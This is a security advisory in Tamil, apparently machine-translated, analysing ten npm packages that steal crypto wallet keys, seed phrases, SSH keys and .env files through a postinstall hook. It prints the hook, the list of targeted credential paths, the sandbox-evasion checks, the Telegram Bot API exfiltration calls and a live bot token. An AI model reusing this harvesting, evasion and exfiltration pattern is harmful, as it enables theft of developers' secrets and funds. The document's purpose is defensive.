டிஎல்; DR
9 ஜூன் 2026 அன்று, ஒரு தனிப்பட்ட npm பப்ளிஷர் கணக்கு, aicrypto-xzgggஅனுப்பப்பட்டது பத்து தொகுப்புகள் கிரிப்டோ மற்றும் வெப்3 சார்ந்த பெயர்களுடன் — farming-tools-12, swap-sdk-87, defi-tools-39, wallet-sdk-9மற்றும் மேலும் ஆறு.
ஒவ்வொரு தொகுப்பும் ஒரே பேலோடை ஒரு இடத்திலிருந்து இயக்குகிறது. postinstall நிறுவலின் போது, அது CI-க்குள் இயங்குகிறதா அல்லது ஒரு சாண்ட்பாக்ஸில் இயங்குகிறதா என்பதைச் சரிபார்க்கிறது — இல்லையெனில், அது வாலட் கீஸ்டோர்கள், சீட்-ஃபிரேஸ் கோப்புகள், SSH கீகள் மற்றும் பலவற்றைப் படிக்கிறது. .env ஆறு பிளாக்செயின் சூழலமைப்புகளில் இருந்து கோப்புகளைப் பெற்று, அவற்றை ஒரு டெலிகிராம் பாட்டிற்கு அனுப்புகிறது.
ஒரு தடுப்பாளர் உடனடியாகத் தேடக்கூடிய ஒரே காட்டி டெலிகிராம் பாட் ஐடி ஆகும். 8227918239.
தீவிரம்: விமர்சன — கையொப்பமிடும் சாவிகள் மற்றும் மீட்பு சொற்றொடர்களை நேரடியாகத் திருடுதல் டெவலப்பர் பணிநிலையங்கள்.
தாக்குதல்: அது எவ்வாறு செயல்படுகிறது
இந்த தொகுப்புகள் தங்களை பிளாக்செயின் டெவலப்பர் பயன்பாடுகள் என விளம்பரப்படுத்துகின்றன. தொகுப்பு.ஜேசன் இது மிகக்குறைந்த கூறுகளைக் கொண்டது மற்றும் நிறுவல் வாழ்க்கைச் சுழற்சியை ஒரு ஸ்கிரிப்ட்டை நோக்கிச் சுட்டிக்காட்டுகிறது:
{ "name": "farming-tools-12", "main": "src/index.js", "scripts": { "postinstall": "node scripts/postinstall.js" }, "keywords": ["web3", "crypto", "blockchain", "solana", "ethereum"], "author": "Alex Smith", "license": "MIT" } scripts/postinstall.js உண்மையான தரவுச் சுமையை ஏற்றும் ஒரு ஒற்றை வரி ஷிம் இது: require(“../src/index.js”). ஏனெனில் நிறுவிய பின் போது தானாகவே இயங்கும் npm நிறுவுடெவலப்பர் எந்தக் குறியீட்டையும் இறக்குமதி செய்ய வேண்டிய அவசியமில்லை — தொகுப்பை ஒரு சார்பு மரத்தில் வைப்பதே அதை இயக்குவதற்குப் போதுமானது.
உள்ளே கொலைச் சங்கிலி src/index.js நான்கு படிகள் உள்ளன:
- சுற்றுச்சூழல் ஆய்வு. ஒரு காப்புச் செயல்பாடு, ஹோஸ்ட் ஒரு பில்ட் ஏஜென்ட் போலத் தோன்றுகிறதா அல்லது பகுப்பாய்வு சாண்ட்பாக்ஸ் போலத் தோன்றுகிறதா என்பதைத் தீர்மானிக்கிறது.
- தாமதம். ஒரு பின்னணியில் செயல்படுத்தல் ஒத்திவைக்கப்படுகிறது நேரம் முடிந்தது தோராயமாக 7.4 வினாடிகள்.
- சேகரிப்பு. வாலட், கீ மற்றும் சீக்ரெட் கோப்புகளின் பாதைகளின் ஒரு நிலையான பட்டியல் சரிபார்க்கப்படுகிறது; ஏற்கனவே உள்ள கோப்புகள் வரிசைப்படுத்தப்படுகின்றன.
- கசிவு நீக்கம். வரிசைப்படுத்தப்பட்ட கோப்புகள், ஒரு சுருக்கச் செய்தியைத் தொடர்ந்து டெலிகிராம் பாட்-க்கு அனுப்பப்படுகின்றன.
சேகரிப்பு இலக்குப் பட்டியலில் ஆறு சங்கிலிகள் மற்றும் பொதுவான டெவலப்பர் இரகசியங்கள் அடங்கும். சுருக்கப்பட்டது:
~/.config/solana/id.json ~/.ethereum/keystore ~/.solana/keypair.json ~/.bitcoin/wallet.dat ~/.tron_wallet/keystore ~/.sui/sui_config/sui.keystore ~/.aptos/key.txt ~/.ssh/id_rsa , ~/.ssh/id_ed25519 ./wallet.json ./keystore.json ./mnemonic.txt ./seed.txt ./seedphrase.txt ./recovery.txt ./private.key ./.env ./.env.local மொத்தம் இருபத்தி ஒரு பாதைகள். கோப்பக உள்ளீடுகள் போன்றவை ~/.ethereum/keystore விரிவாக்கப்பட்டு, உள்ளே இருக்கும் ஒவ்வொரு கோப்பும் வரிசைப்படுத்தப்படுகிறது. இந்தக் கசிவு, டெலிகிராம் பாட் ஏபிஐ-ஐ (Telegram Bot API) நேரடியாகப் பயன்படுத்துகிறது. செய்தியை அனுப்பு ஹோஸ்ட் மற்றும் கோப்புச் சுருக்கத்துடன் அழைக்கவும், பின்னர் ஒரு ஆவணத்தை அனுப்பு ஒவ்வொரு கோப்பிற்குமான பல பகுதி பதிவேற்றம்:
உரை
POST https://api.telegram.org/bot<token>/sendMessage POST https://api.telegram.org/bot<token>/sendDocument (one per file) நிரல் உருவாக்கும் சுருக்கச் செய்தி, நேரடிச் சரத்துடன் தொடங்குகிறது. கிரிப்டோ திருடன்அதனைத் தொடர்ந்து ஹோஸ்ட்பெயர், பயனர்பெயர், மூல தொகுப்பின் பெயர், கோப்புகளின் எண்ணிக்கை மற்றும் நேரமுத்திரை.
இங்கே புதிதாக என்ன இருக்கிறது?
வேறுபடுத்தும் காரணி திருட்டு வழிமுறை அல்ல — npm இலிருந்து டெலிகிராம் அடிப்படையிலான தரவு வெளியேற்றம். நிறுவிய பின் hooks இது நன்கு அறியப்பட்ட ஒன்று. அதுதான் செயல்படுத்தும் வாயில். எதையும் செய்வதற்கு முன், ஹோஸ்ட் ஒரு CI ரன்னர் அல்லது சாண்ட்பாக்ஸைப் போல இருக்கும்போது 'true' எனத் திருப்பியளிக்கும் ஒரு செயல்பாட்டை பேலோட் அழைக்கிறது, மேலும் அது அவ்வாறு இருக்கும்போது 'early' எனத் திரும்புகிறது:
உரை
isTestEnvironment() is true when ANY of: - env CI == "true" OR GITHUB_ACTIONS == "true" OR JENKINS_HOME set - env NODE_ENV in {test, development} - username/USER contains: runner, sandbox, test, docker, jenkins, gitlab, travis, circleci - hostname contains: sandbox, test, ci - hostname matches /^[a-f0-9]{12}$/ (a container-id shape) கண்டெய்னர்-ஐடி ரெகுலர் எக்ஸ்பிரஷன் (regex) ஒரு குறிப்பிடத்தக்க அம்சமாகும்: 12 ஹெக்ஸ் எழுத்துக்கள் கொண்ட ஹோஸ்ட்நேம் என்பது டாக்கர் ஒரு கண்டெய்னருக்கு ஒதுக்கும் இயல்புநிலை வடிவமாகும். கொள்கலன்அதனால், அந்தப் பேலோட், "எனது ஹோஸ்ட்பெயர் ஒரு டாக்கர் கண்டெய்னர் போலத் தெரிகிறது" என்பதைச் செயலற்று இருப்பதற்கான ஒரு காரணமாகக் கருதுகிறது. ஏழு வினாடித் தாமதத்துடன் இணைந்த இந்த வடிவமைப்பு, ஒரு டெவலப்பரின் உண்மையான பணிநிலையத்தில் இயங்குவதற்கும், தானியங்குப் பகுப்பாய்வு போலத் தோன்றும் எந்த இடத்திலும் அமைதியாக இருப்பதற்கும் சாதகமாக உள்ளது. அந்தத் தடுப்பு வாயில்தான் டைனமிக்-அனாலிசிஸ் சிக்னல்களை அடக்கி, ஸ்டேடிக் எக்ஃபில் ஃப்ளோவை முதன்மைக் குற்ற நிரூபண ஆதாரமாக வைத்திருந்தது.
காலக்கெடு
| தேதி (UTC) | நிகழ்வு |
|---|---|
| 2026-06-09 ~02:48 | கிளஸ்டரில் உள்ள முதல் தொகுப்புகள் வெளியீட்டின் போது குறியிடப்பட்டன (crypto-utils-7, ethereum-kit-1, web3-tools-9, solana-core-4, blockchain-helper-0) |
| 2026-06-09 ~03:21–03:25 | உயர் பதிப்பு உறுப்பினர்கள் கொடியிடப்பட்டனர் (ethereum-kit-9 1.25.36 மணிக்கு, wallet-sdk-9 3.7.73 மணிக்கு) |
| 2026-06-09 ~03:58–03:59 | இறுதி உறுப்பினர்கள் கொடியிடப்பட்டனர் (defi-tools-39 4.26.29 மணிக்கு, swap-sdk-87 4.63.78 மணிக்கு, farming-tools-12 4.68.54 மணிக்கு) |
| 2026-06-09 | பத்தும் தீங்கிழைக்கும் தன்மை கொண்டவை என வகைப்படுத்தப்பட்டு, பதிவேட்டிலிருந்து நீக்கப்படுவதற்காகப் புகாரளிக்கப்பட்டன. |
அனைத்து பத்தும் சுமார் எழுபது நிமிடங்களுக்குள் வெளிவந்தன, இது ஒரே கணக்கிலிருந்து திட்டமிடப்பட்ட ஒற்றை வெளியீட்டுச் செயல்முறைக்கு இசைவானதாக இருந்தது.
சமரசத்தின் குறிகாட்டிகள்
பிணைய மற்றும் நடத்தை சார்ந்த குறிகாட்டிகள் (ஹோஸ்டின் செயல்திறன் குறைக்கப்பட்டது):
| காட்டி | மதிப்பு |
|---|---|
| வெளியேற்ற முனை | api[.]telegram[.]org (டெலிகிராம் பாட் ஏபிஐ) |
| டெலிகிராம் பாட் ஐடி | 8227918239 |
| போட் டோக்கன் | 8227918239:AAGEMDrBZluDsBBYPxfSyMuv2l3FY8cZCcs |
| டெலிகிராம் அரட்டை ஐடி | 6433587894 |
| ஹூக்கை நிறுவவும் | postinstall → scripts/postinstall.js → src/index.js |
| குறிப்பான் சரம் | CRYPTO STEALER தொகுக்கப்பட்ட சுருக்க செய்தியில் |
| வெளியீட்டாளர் | aicrypto-xzggg (குறிப்பிட்ட மின்னஞ்சல்) vipsyria88@gmail[.]com(சரிபார்க்கப்படாத) |
தொகுப்புகள் மற்றும் பதிப்புகள், ஒவ்வொன்றும் அதன் SHA-256 உடன் src/index.js பேலோட் (பேலோட்கள் செயல்பாட்டு ரீதியாக ஒரே மாதிரியானவை மற்றும் உட்பொதிக்கப்பட்ட தொகுப்பு-பெயர் லேபிளில் மட்டுமே வேறுபடுகின்றன, எனவே ஒவ்வொரு ஹாஷும் தனித்துவமானது):
| தொகுப்பு | பதிப்பு | src/index.js இன் SHA-256 |
|---|---|---|
farming-tools-12 | 4.68.54 | b50403be9dd9f94f7af4795c1e346c9d27d5a18041a3044773238c4cdc1f4de4 |
swap-sdk-87 | 4.63.78 | 9d96f8759e8d593b6dd2338aceb08cdb12e9a5613700953e04e66cc8c2e3087c |
defi-tools-39 | 4.26.29 | ddc5011b6173a57bc7f29b010ed6b71551dee253b5d05d3efc78d076f5351fee |
wallet-sdk-9 | 3.7.73 | ef4459281c64f1fe8923d703d416f04080ff1a2b7b385366f46d7cdb25731502 |
ethereum-kit-9 | 1.25.36 | c43afad949027040c6414d26fa4eea6e2671d2572f9df7fd595e12baf204854f |
ethereum-kit-1 | 1.0.0 | 1147f5227f3b13f65a438b31d87766c33affc65b7734a8658c95e0a4be1d2381 |
solana-core-4 | 1.0.0 | 93c65f971137d2753b5c57b685471bf5319bdc357fa863de56cbed8447cf576d |
web3-tools-9 | 1.0.0 | db97070bd349503f5703404493fc925448c2308c86708b33786309ebe6446a3d |
crypto-utils-7 | 1.0.0 | 59f2fb112d6f17102fb4a70c8d12bfcbc93e9f0d170fe4451bad1aa4d5d74c92 |
blockchain-helper-0 | 1.0.0 | 053eb318980439d76eecac9847ae31ecf59654cf75ddcfebbdd9ce64bb98a0db |
ஒரு எளிய தேடல் வினவல்: நிறுவல் பதிவுகள் மற்றும் லாக்ஃபைல்களில் அந்தப் பத்து பெயர்களில் ஏதேனும் ஒன்றைத் தேடுங்கள்; மேலும், டெலிகிராம் பாட் ஏபிஐ-ஐ வேறுவிதமாகப் பயன்படுத்தாத பில்ட் அல்லது டெவலப்பர் ஹோஸ்ட்களிலிருந்து வரும் இணைப்புகளுக்காக வெளிச்செல்லும் டிராஃபிக்கையும் தேடுங்கள்.
காரணம் கற்பித்தல் மற்றும் கவனிக்கப்பட்ட நடத்தை
பத்து தொகுப்புகளும் ஒரே கணக்கினால் வெளியிடப்பட்டன. aicrypto-xzgggயாருடைய மின்னஞ்சல் முகவரி குறிப்பிடப்பட்டுள்ளது vipsyria88@gmail[.]comபதிவக மெட்டாடேட்டாவில் மின்னஞ்சலும் மூலக் கட்டுப்பாட்டு இணைப்பும் சரிபார்க்கப்படவில்லை, மேலும் அந்தக் கணக்கு மிகவும் எதிர்மறையான நற்பெயர் மதிப்பெண்ணைக் கொண்டுள்ளது. இந்தக் கணக்கை யார் இயக்குகிறார்கள் என்பதை நாங்கள் உறுதிப்படுத்தவில்லை.
எந்தவொரு அடையாளக் கூற்றிலிருந்தும் இரண்டு விவரங்களைத் தனியாகப் பிரிப்பது அவசியம். முதலாவதாக, தொகுப்பு.ஜேசன் ஆசிரியர் புல வாசிப்புகள் அலெக்ஸ் ஸ்மித் ஒவ்வொரு தொகுப்பிலும், அதே சமயம் உண்மையான வெளியீட்டுக் கணக்கு aicrypto-xzggg; ஆசிரியர் புலம் என்பது சுயமாக அறிவிக்கப்பட்ட மெட்டாடேட்டாவாகும், அது ஆசிரியர் உரிமையை நிலைநாட்டாது. இரண்டாவதாக, பதிப்பு எண்கள் பரவலாக வேறுபடுகின்றன — சில உறுப்பினர்கள் ஒரே நிலையில் உள்ளனர். 1.0.0மற்றவர்கள் 4.68.54 உண்மையான வெளியீட்டு வரலாறுகளைப் பராமரிப்பதற்குப் பதிலாக, புதிதாக உருவாக்கப்பட்ட தொகுப்புப் பெயர்களில் ஒரே தரவுப் புலத்தை மீண்டும் பயன்படுத்துவதற்கு இது இசைவானதாக உள்ளது.
கிளஸ்டர் முழுவதும் செயல்பாடு சீராக உள்ளது: ஒரே இலக்குப் பாதை பட்டியல், ஒரே டெலிகிராம் பாட் ஐடி மற்றும் சாட் ஐடி, ஒரே என்விரான்மென்ட் கேட், ஒரே கிரிப்டோ திருடன் அடையாளக்குறி. அந்தச் சீரான தன்மையே தொகுப்புகளுக்கு இடையேயான மிக வலிமையான இணைப்பு. அது ஒரே இயக்குநருக்கான சமிக்ஞையே தவிர, ஓர் அடையாளம் அல்ல.
பாதுகாவலர்களுக்கான தாக்கம், போக்குகள் மற்றும் வழிகாட்டுதல்
இந்த பாதிப்பு உறுதியானது. ஒரு மென்பொருள் வாலட், ஒரு சீட்-ஃபிரேஸ் கோப்பு அல்லது ஒரு SSH கீ ஆகியவற்றைக் கொண்டிருக்கும் ஒரு பணிநிலையத்தில், இந்தத் தொகுப்புகளில் ஏதேனும் ஒன்றை ஒரு டெவலப்பர் நிறுவும்போது, அந்தக் கோப்புகள் சில நொடிகளுக்குள் ஹோஸ்டிலிருந்து படிக்கப்பட்டு வெளியே அனுப்பப்படுகின்றன. ஒரு செஷன் டோக்கனைப் போல மீட்பு சொற்றொடர்களும் கையொப்பமிடும் சாவிகளும் காலாவதியாவதில்லை; ஒருமுறை நிறுவப்பட்டால், அவை உடனடியாகப் படிக்கப்பட்டு, ஹோஸ்ட்டிலிருந்து வெளியே அனுப்பப்படுகின்றன. நினைவூட்டல்.txt அல்லது ஒரு சோலானா id.json இயந்திரத்தை விட்டு வெளியேறும்போது, அது கட்டுப்படுத்தும் நிதிகள் நகர்த்தப்படும் வரை ஆபத்தில் உள்ளன. அதே செயல்பாடு இதையும் கைப்பற்றுகிறது. .env வழக்கமாக API திறவிகள் மற்றும் தரவுத்தளச் சான்றுகளைக் கொண்டிருக்கும் கோப்புகள்.
இந்தக் குழுமத்திற்குப் பின்னால் இரண்டு போக்குகள் உள்ளன. முதலாவது, ஒரு குறிப்பிட்ட பார்வையாளர்களைக் கவர, கிரிப்டோ மற்றும் வெப்3 சார்ந்த பெயர்களின் தொடர்ச்சியான பயன்பாடு ஆகும் — அதாவது, சார்புநிலைகளை நிறுவும் அதே கணினியில் தங்கள் வாலெட்டுகள் மற்றும் கீகளை வைத்திருக்கும் டெவலப்பர்கள். இரண்டாவது, நிறுவும் நேரப் பேலோடுகளில் சாண்ட்பாக்ஸ் தவிர்ப்பு முதிர்ச்சியடைவது ஆகும். CI சூழல் மாறிகள், ரன்னர் பயனர்பெயர்கள் மற்றும் ஒரு டாக்கர் கண்டெய்னர்-ஐடி ஹோஸ்ட்பெயர் வடிவம் ஆகியவற்றைச் சரிபார்க்கும் ஒரு கேட் என்பது, ஒரு உண்மையான பணிநிலையத்தில் செயல்படுவதை விட பகுப்பாய்வின் கீழ் வித்தியாசமாகச் செயல்படுவதற்கான ஒரு திட்டமிட்ட முயற்சியாகும், மேலும் இது முற்றிலும் டைனமிக் கண்டறிதலுக்கான தரத்தை உயர்த்துகிறது.
தடுப்பாட்டக்காரர்களுக்கு:
இயல்பாகவே ஸ்கிரிப்டுகள் முடக்கப்பட்ட நிலையில் நிறுவவும். npm install –ignore-scriptsஅல்லது தொகுப்பு ignore-scripts=true in .npmrc ., தடுக்கிறது நிறுவிய பின் செயல்படுத்தல்; உண்மையிலேயே தேவைப்படும் குறிப்பிட்ட சார்புகளுக்கு மட்டும் ஸ்கிரிப்டுகளை இயக்கவும்.
வாலெட்டுகள் மற்றும் கையொப்பமிடும் சாவிகளை பில்ட் மற்றும் டெவலப்மென்ட் மெஷின்களில் இருந்து விலக்கி வைக்கவும். ஒரு ஹார்டுவேர் வாலெட் அல்லது பிரத்யேகமான, சார்பற்ற கையொப்பமிடும் ஹோஸ்டைப் பயன்படுத்தவும்.
டிரீட் .envகீஸ்டோர்களும், சீட்-ஃபிரேஸ் கோப்புகளும் மிக மதிப்புமிக்கவை. அவை ஒருபோதும் மற்றொரு கோப்பகத்தில் இருக்கக்கூடாது. npm நிறுவு செயல்படும் மரம்.
CI மற்றும் டெவலப்பர் ஹோஸ்ட்களிலிருந்து டெலிகிராம் பாட் API-க்கு வரும் வெளிச்செல்லும் இணைப்புகளைத் தேடுங்கள். பெரும்பாலான பில்ட் சூழல்கள் அதை ஒருபோதும் அழைப்பதில்லை; நிறுவிய உடனேயே திடீரென அழைக்கும் ஒன்று, ஆராய்வதற்கு உகந்தது.
சார்புகளைக் குறியிட்டு மதிப்பாய்வு செய்யவும். ஒரு பொதுவான கிரிப்டோ பெயருடன் கூடிய புத்தம் புதிய தொகுப்பு, ஒரு நிறுவிய பின் ஒரு ஹூக் உள்ளது, மேலும் எந்த ரெபாசிட்டரி இணைப்பும் லாக்ஃபைலில் நுழைவதற்கு முன்பு அதைச் சரிபார்க்க வேண்டிய அவசியமில்லை.
கண்டெய்னர்-ஐடி தவிர்ப்பு விதியானது பகுப்பாய்வாளர்களுக்கு ஒரு நினைவூட்டலாகவும் உள்ளது: ஒரு சாண்ட்பாக்ஸில் செயலற்று இருக்கும் நிறுவல் நேர பேலோட் தீங்கற்றதல்ல, அது தேர்ந்தெடுக்கப்பட்டதாகும். டைனமிக் செயலாக்கம் எதைக் காட்ட மறுக்கக்கூடும் என்பதைக் கண்டறிய, நிறுவல் பாதையின் நிலையான மதிப்பாய்வே நம்பகமான வழியாகும்.
குறிப்புகள்
npm நிறுவல் ஆவணங்கள் — வாழ்க்கைச் சுழற்சி ஸ்கிரிப்டுகள் மற்றும் ஸ்கிரிப்ட்களை புறக்கணிக்கவும்தானியங்கி நிறுவலை முடக்குவதற்கான குறிப்பு hooks.





